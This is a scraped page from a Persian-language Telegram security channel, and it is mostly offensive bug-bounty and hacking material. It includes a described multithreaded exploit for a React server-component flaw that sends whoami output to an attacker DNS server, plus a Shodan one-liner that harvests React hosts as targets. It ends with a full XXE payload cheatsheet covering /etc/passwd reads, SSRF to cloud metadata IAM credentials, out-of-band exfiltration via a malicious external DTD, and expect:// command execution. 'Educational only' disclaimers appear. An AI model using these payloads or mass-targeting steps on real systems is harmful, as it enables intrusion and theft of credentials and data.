RadvanSec – Telegram
RadvanSec
990 subscribers
181 photos
27 videos
142 files
594 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
OWASP_AI_Testing_Guide.pdf
6.2 MB
#MLSecOps
#Whitepaper
#Threat_Modelling
"OWASP AI Testing Guide", Version 1, Nov. 2025.
]-> Repo

// This Guide is designed to serve as a comprehensive reference for software developers, architects, data analysts, researchers, auditors and risk officers, ensuring that AI risks are systematically addressed throughout the product development lifecycle

@Radvansec
8
اگه میخوای بیشتر XSS هات P2,P1 بشن از نکته زیر استفاده کن
۹۹ درصد باگ هانترا (صرفا باگ هانترا) راجب این تکنیک چیزی نمیدونن ولی وقتی ترکیبش میکنی تو گزارشت تریاژر خوف میکنه رسما
سعی کن هکر باشی ❤️‍🔥😉


https://x.com/pentesterlanden/status/1994795913488077214?s=46
7
This media is not supported in your browser
VIEW IN TELEGRAM
Injecting a DLL into an Explorer process using icons

https://github.com/d419h/IconJector

⭐️ @RadvanSec
3👍1
امروز روز جهانی امنیت سایبری است؛ روزی برای یادآوری یک واقعیت مهم:
هر کلیک می‌تواند مخاطره‌آمیز باشد، هر ایمیل بالقوه یک تهدید است و هر بی‌احتیاطی ممکن است پیامدهای جدی و جبران‌ناپذیری به‌دنبال داشته باشد.
امنیت صرفاً به ابزارها وابسته نیست؛ بخش بزرگی از آن به رفتار و دقت ما بازمی‌گردد.
به همین دلیل، امروز فرصتی مناسب است تا چند اقدام ساده اما حیاتی را مرور کنیم: استفاده از گذرواژه‌های امن و پیچیده، پرهیز از باز کردن پیام‌ها و پیوست‌های مشکوک، و توجه به ارزش واقعی داده‌هایی که در اختیار داریم.
در جهانی که هر روز بیش از گذشته دیجیتالی می‌شود، توجه به امنیت اطلاعات باید به یک عادت جدی و همیشگی تبدیل شود.

💻 گروه لیان
☺️ https://liangroup.net/
☺️ @AcademyLian
Please open Telegram to view this post
VIEW IN TELEGRAM
6
CVE-2025-47776 - 1day, MantisBT vulnerable to authentication bypass for some passwords due to PHP type juggling

#Pruva today reproduction and exploit.

Exploit

⭐️ @RadvanSec
4👍2🔥1👏1
Sin0x001
Web Application Security-Persian.pdf
کتاب web application رو گفتید بزارم ترجمش رو یکی از بچه ها زحمت کشیده کانالشون :
@web_articles
👍42
آره داداش داشتم میگفتم صبح تا شب پشت کامپیوتر میشینید الکی پول درمیارید 🤡

⭐️ @RadvanSec
🤣16👌4😎1
40 Methods for Privilege Escalation Linux-Windows-macOS.pdf
84.9 MB
40 Methods Of Privilege Escalation of Linux, Windows and Mac

۴۰ روش افزایش سطح دسترسی در لینوکس، ویندوز و مک

⭐️ @RadvanSec
6👍2
بچه هایی که باگ بانتی کار میکنید رفلکشن روی js فایل ها براتون اهمیت داره یا خیلی ساده ازش رد میشید؟!

بگین یه tip کلاینت ساید بهتون بگم
Anonymous Poll
36%
اهمیتی نداره برام چون کانتنت صفحه html نیست
64%
اهمیت داره و سعی میکنم اکسپلویت کنم
3🔥1
🔥7
‌ ‌®
Voice message
چند نفر از بچه ها گفته بودن چرا کاری که همه انجام میدن رو ماهم باید انجام بدیم عملا این طرز فکر که شما کاری رو انجام بدی که بقیه حتی به فکرشون هم خطور نمیکنه کاملا ایده ی نیچ ای هست و بسیار عالیه و سر این اصلا بحثی نداریم👌

ولی این دلیل نمیشه ما یک کار ثابت که خیلیا شاید ازش نتیجه میگیرن رو نادید بگیریم و انجام ندیم مثلا الان CVE جدیدی که اومده اگر بدونید روی تارگت هایی که دارین ران کنید صد تا هانتر دیگه هم انجام میدن و احتمال داره duplicate بشه گزارشتون, بازم شما باید اون کارو انجام بدید حدااقلش اینه یک کار مثبت انجام دادید و شاید راه های بهتری براتون باز شد.

و در کل از چیزی نترسید اگر چیزی رو خدا روزیتون قرار بده نصیبتون میشه و کسی نمیتونه جلوشو بگیره و اینکه سعی کنید هر روز رشد کنید حتی اندک 🌹🙏
8👏1👌1
react-cve-03.py
2.6 KB
به دلیل اشتباهات زیادی که در اکسپلویت مربوط به CVE-2025-55182
یه کد پایتون ساده مولتی ترد اماده کردم که به راحتی خروجی whoami رو میفرسته به سرور مهاجم

فقط هم این سه تا کتابخونه ایمورت شده که دوتاش برا درخواست و عدم نشون دادن خطاست (ریکویست و یو ار ال لیب) و ترد برا سرعت بالا
ادرس دی ان اس تون رو بدید (برپ کولب یا وب هوک دی ان اس هم اوکیه)
لیست تارگت ها

خروجی whoami میاد برا دی ان اگه اسیب پذیر باشه
درصد جواب دهی ؟ 100% تست شده روی بیش از n ادرس ازمایشگاهی (لابراتوار بوده : D )
تمامی این کد صرفا جهت موارد اموزشی و هکر قانون مند نوشته شده و انجام هرگونه عملیات مخرب روی ادرس هایی که مجوز ندارید خلاف قوانین و نیت این ابزار هست
نکته :‌ترکیبش کنید با api shodan ببینید چی میده
5
Shodan cli command 😁️
shodan search --fields ip_str,port --limit 1000 'http.component:"react"' | awk '{print "https://"$1":"$2}' > test.txt

باز هم برای مصارف اموزشی این رو فقط رو ای پی هایی که اجازه دارید بزنید
قانون مند باشید
5
این پست توضیحات اسیب پذیری ترسناک و جدیدی هست که روی React o nextjs یا دقیق تر بگم RSC اومده، و منجر به دسترسی به سرور میشه و خلاصه مهاجم میتونه بیاد تو(و همه چیز از تو اومدن شروع میشه)😁:

https://www.instagram.com/reel/DR37lC-jSZs/?igsh=MWg4MWplN2o0bXhrNw==


خیلی دوست دارم اون روزی بیاد که پستا تخصصی بیشتر محتوا زرد و طنز دیده بشه 😁❤️‍🔥
6
ActiveScan++ now detects React2Shell: link
Nuclei Template: link
6👍2
XXE Cheatsheet

using external entities:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>



perform SSRF attacks:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>



Blind XXE with out-of-band interaction:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://burp-collab"> ]>



Blind XXE with out-of-band interaction via XML parameter entities:

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://burp-collaborator> %xxe; ]>



blind XXE to exfiltrate data using a malicious external DTD:
DTD file:

<!ENTITY % eval "<!ENTITY &#x25; test SYSTEM 'http://burp-collaborator/?a=%file;'>">
%eval;
%test;XXE Payload:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>



blind XXE to retrieve data via error messages:
DTD file:

<!ENTITY % notvalid "<!ENTITY &#x25; test SYSTEM 'file:///invalid/%file;'>">
%notvalid;
%test;XXE Payload:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "YOUR-DTD-URL"> %xxe;]>



XInclude to retrieve files:

<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>



XXE via image file upload:

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><noscript width="128px" height="128px" xmlns="http://www.w3.org/2000/noscript" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></noscript>



XXE inside SOAP body:

<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>



XXE: Base64 Encoded:
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>



XXE inside SVG:

<noscript xmlns="http://www.w3.org/2000/noscript" xmlns:xlink
<image xlink:href="expect://ls"></image>
</noscript>



⭐️ @RadvanSec
4👍2